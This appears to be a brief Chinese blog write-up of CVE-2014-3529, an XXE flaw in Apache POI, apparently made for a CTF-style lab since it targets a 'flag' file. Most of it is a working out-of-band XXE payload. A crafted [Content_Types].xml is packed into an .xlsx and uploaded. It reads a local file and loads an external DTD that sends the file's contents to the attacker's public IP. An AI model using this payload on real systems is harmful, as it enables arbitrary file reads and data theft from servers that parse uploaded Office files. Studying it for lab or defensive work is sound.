文章

CVE-2014-3529

发表于
作者 Leo 1 分钟阅读

CVE-2014-3529

必须要公网IP,目标主机可以访问到你的机器给你发送数据

  1. 描述

Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。

  1. Alt text

  1. 准备两个资源

[Content_Types].xml 目标端执行的文件,压缩成zip文件后修改后缀为.xlsx,进行上传

1
2
3
4

<!-- [Content_Types].xml -->
<!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///flag"> 
<!ENTITY % dtd SYSTEM "http://your public ip/xxe.dtd">
%dtd; %send;]>

xxe.dtd 用于xml里面执行的dtd文件

1
2
3

<!-- xxe.dtd -->
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://your public/%file;'>">
%all;

  1. 执行 Alt text

  2. 可以返回命令

Blogging, CVE
cve
本文由作者按照 CC BY 4.0 进行授权